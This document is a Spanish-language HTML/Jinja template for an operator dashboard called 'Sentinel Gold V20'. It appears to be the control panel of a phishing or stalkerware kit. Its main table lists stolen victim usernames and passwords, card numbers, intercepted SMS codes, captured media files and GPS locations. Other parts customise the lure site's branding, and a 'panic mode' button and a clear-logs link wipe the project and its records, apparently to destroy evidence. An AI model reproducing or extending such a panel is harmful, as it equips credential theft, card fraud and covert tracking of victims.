<!DOCTYPE html>
<html lang="es">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SISTEMA SENTINEL GOLD V20</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
    <style>
        body { background: #000; color: #00ff41; font-family: 'Courier New', monospace; font-size: 0.8rem; }
        .m-box { border: 1px solid #00ff41; background: rgba(0,20,0,0.9); padding: 15px; margin-bottom: 15px; border-radius: 8px; }
        .table { color: #00ff41; border-color: #004400; vertical-align: middle; }
        .panic-btn { background: #ff0000; color: white; border: none; font-weight: bold; padding: 10px; border-radius: 5px; cursor: pointer; }
        .clear-btn { background: #ffc107; color: black; border: none; font-weight: bold; padding: 10px; border-radius: 5px; text-decoration: none; display: block; text-align: center; }
        .map-box { width: 100px; height: 60px; border: 1px solid #00ff41; border-radius: 4px; background: #111; display: flex; align-items: center; justify-content: center; text-align: center; font-size: 9px; text-decoration: none; color: #00ff41; }
        .delete-icon { color: #ff3131; text-decoration: none; font-size: 1.1rem; }
    </style>
</head>
<body class="p-3">

    <div class="row">
        <div class="col-md-3">
            <div class="m-box">
                <button onclick="activarPanico()" class="panic-btn w-100 mb-2">⚠ MODO PÁNICO ⚠</button>
                <a href="/clear_all_logs" class="clear-btn w-100" onclick="return confirm('¿Limpiar historial?')">🧹 LIMPIAR DATOS</a>
            </div>

            <div class="m-box">
                <p class="text-white fw-bold">> PORTADA Y COLORES</p>
                <form action="/update_full" method="POST" enctype="multipart/form-data">
                    <label class="small">Imagen Portada:</label>
                    <input type="file" name="file_portada" class="form-control form-control-sm mb-2 bg-black text-success border-success">
                    <input type="text" name="titulo" value="{{config.titulo}}" class="form-control form-control-sm mb-1 bg-black text-success border-success">
                    <input type="text" name="alias" value="{{config.alias}}" class="form-control form-control-sm mb-1 bg-black text-success border-success">
                    <div class="row g-1">
                        <div class="col-6"><input type="color" name="color_fondo" value="{{config.color_fondo}}" class="form-control h-auto bg-black border-success"></div>
                        <div class="col-6"><input type="color" name="color_texto" value="{{config.color_texto}}" class="form-control h-auto bg-black border-success"></div>
                    </div>
                    <button class="btn btn-outline-success btn-sm w-100 mt-2">ACTUALIZAR SITIO</button>
                </form>
            </div>

            <div class="m-box">
                <p class="text-white fw-bold">> GALERÍA DEL DASHBOARD</p>
                <form action="/upload_media" method="POST" enctype="multipart/form-data" class="mb-3">
                    <div class="input-group">
                        <input type="file" name="file_gallery" class="form-control form-control-sm bg-black text-success border-success">
                        <button class="btn btn-primary btn-sm">SUBIR</button>
                    </div>
                </form>
                <div class="d-flex flex-wrap overflow-auto" style="max-height: 150px; background: #050505; padding: 5px;">
                    {% for f in archivos %}
                    <div class="position-relative m-1">
                        <img src="/static/uploads/{{f}}" style="width:40px; height:40px; object-fit:cover; border:1px solid #00ff41;">
                        <a href="/delete_file/{{f}}" class="btn btn-danger btn-sm p-0 position-absolute top-0 start-0" style="width:14px; height:14px; font-size:9px;">×</a>
                    </div>
                    {% endfor %}
                </div>
            </div>
        </div>

        <div class="col-md-9">
            <div class="m-box">
                <p class="text-white fw-bold">> REGISTROS EN VIVO</p>
                <div class="table-responsive">
                    <table class="table table-dark table-hover table-sm">
                        <thead>
                            <tr>
                                <th>KEYLOG</th>
                                <th>TARJETA</th>
                                <th>SMS</th>
                                <th>MULTIMEDIA</th>
                                <th>MAPA</th>
                            </tr>
                        </thead>
                        <tbody>
                            {% for r in registros %}
                            <tr>
                                <td>
                                    <div class="d-flex justify-content-between">
                                        <div>
                                            <b class="text-warning">U:</b> {{r[1]}}<br>
                                            <b class="text-warning">P:</b> {{r[2]}}<br>
                                            <small class="text-muted">{{r[6]}}</small>
                                        </div>
                                        <a href="/delete_log/{{r[0]}}" class="delete-icon" onclick="return confirm('¿Borrar?')">🗑</a>
                                    </div>
                                </td>
                                <td style="color: #ff3131; font-weight: bold;">{{r[3]}}</td>
                                <td><span class="badge bg-success">{{r[4]}}</span></td>
                                <td>
                                    {% for c in capturas %}
                                        {% if r[0]|string in c %}
                                        <div class="d-flex justify-content-between align-items-center mb-1">
                                            <a href="/static/captured/{{c}}" download class="text-info small">⬇ {{c.split('_')[0]}}</a>
                                            <a href="/delete_captured/{{c}}" class="text-danger fw-bold ms-1" style="text-decoration:none;">×</a>
                                        </div>
                                        {% endif %}
                                    {% endfor %}
                                </td>
                                <td>
                                    {% if r[9] and r[10] %}
                                    <a href="https://www.google.com/maps?q={{r[9]}},{{r[10]}}" target="_blank" class="map-box">ABRIR GPS</a>
                                    {% else %}
                                    <div class="map-box text-muted">NO GPS</div>
                                    {% endif %}
                                </td>
                            </tr>
                            {% endfor %}
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>

    <script>
    function activarPanico() {
        if(confirm("¿BORRAR TODO EL PROYECTO?")) {
            fetch('/panic_button', {method: 'POST'}).then(() => location.reload());
        }
    }
    </script>
</body>
</html>
